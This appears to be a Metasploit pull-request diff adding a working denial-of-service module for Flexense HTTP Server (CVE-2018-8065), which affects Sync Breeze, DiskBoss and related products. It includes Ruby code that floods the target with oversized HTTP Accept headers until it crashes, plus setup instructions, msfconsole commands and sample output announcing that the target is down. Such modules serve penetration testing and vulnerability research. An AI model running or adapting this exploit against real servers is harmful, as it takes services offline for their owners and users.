Land #9701, Flexense HTTP Server DoS exploit

documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md

@@ -0,0 +1,67 @@
+## Description
+This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger 
+a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.  
+
+
+## Vulnerable Application 
+According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
+Following list of softwares are vulnerable to Denial Of Service.
+read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065
+
+	
+DiskBoss Enterprise    <= v9.0.18
+Sync Breeze Enterprise <= v10.6.24
+Disk Pulse Enterprise  <= v10.6.24
+Disk Savvy Enterprise  <= v10.6.24
+Dup Scout Enterprise   <= v10.6.24
+VX Search Enterprise   <= v10.6.24
+
+
+**Vulnerable Application Link** 
+http://www.diskboss.com/downloads.html
+http://www.syncbreeze.com/downloads.html
+http://www.diskpulse.com/downloads.html
+http://www.disksavvy.com/downloads.html
+http://www.dupscout.com/downloads.html
+
+
+## Vulnerable Application Installation Setup.
+All Flexense applications that are listed above can be installed by following these steps.
+
+Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe```
+
+**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard**
+
+After the installation navigate to: ```Options->Server```
+
+Check the box saying: ```Enable web server on port:...```
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use auxiliary/dos/http/flexense_http_server_dos`
+  4. Do: `set rport <port>`
+  5. Do: `set rhost <ip>`
+  6. Do: `check`
+```
+[+] 192.168.1.20:80 The target is vulnerable.
+```
+  7. Do: `run`
+  8. Web server will crash after 200-1000 request depending on the OS version and system memory.
+
+## Scenarios
+**TESTED AGAINST WINDOWS 7/10**
+```
+msf5 > use auxiliary/dos/http/flexense_http_server_dos 
+msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27
+rhost => 192.168.1.27
+msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80
+rport => 80
+msf5 auxiliary(dos/http/flexense_http_server_dos) > run
+
+[*] 192.168.1.20:80 - Triggering the vulnerability
+[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down !
+[*] Auxiliary module execution completed
+
+```

modules/auxiliary/dos/http/flexense_http_server_dos.rb

@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Dos
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Flexense HTTP Server Denial Of Service',
+      'Description'    => %q{
+        This module triggers a Denial of Service vulnerability in the Flexense HTTP server.
+        Vulnerability caused by a user mode write access memory violation and can be triggered with
+        rapidly sending variety of HTTP requests with long HTTP header values.
+
+        Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
+      },
+      'Author' 		=> [ 'Ege Balci <ege.balci@invictuseurope.com>' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2018-8065'],
+          [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],
+        ],
+      'DisclosureDate' => 'Mar 09 2018'))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('PacketCount',     [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),
+        OptString.new('PacketSize',      [ true, "The number of bytes in the Accept header (Recommended: 4088-5090"  , rand(4088..5090) ])
+      ])
+
+  end
+
+  def check
+    begin
+      connect
+      sock.put("GET / HTTP/1.0\r\n\r\n")
+      res = sock.get
+      if res and res.include? 'Flexense HTTP Server v10.6.24'
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue Rex::ConnectionRefused
+      print_error("Target refused the connection")
+      Exploit::CheckCode::Unknown
+    rescue
+      print_error("Target did not respond to HTTP request")
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+  def run
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    size = datastore['PacketSize'].to_i
+    print_status("Starting with packets of #{size}-byte strings")
+
+    count = 0
+    loop do
+      payload = ""
+      payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"
+      payload << "Host: 127.0.0.1\r\n"
+      payload << "Accept: "+('A' * size)+"\r\n"
+      payload << "\r\n\r\n"
+      begin
+        connect
+        sock.put(payload)
+        disconnect
+        count += 1
+        break if count==datastore['PacketCount']
+      rescue ::Rex::InvalidDestination
+        print_error('Invalid destination!  Continuing...')
+      rescue ::Rex::ConnectionTimeout
+        print_error('Connection timeout!  Continuing...')
+      rescue ::Errno::ECONNRESET
+        print_error('Connection reset!  Continuing...')
+      rescue ::Rex::ConnectionRefused
+        print_good("DoS successful after #{count} packets with #{size}-byte headers")
+        return true
+      end
+    end
+    print_error("DoS failed after #{count} packets of #{size}-byte strings")
+  end
+end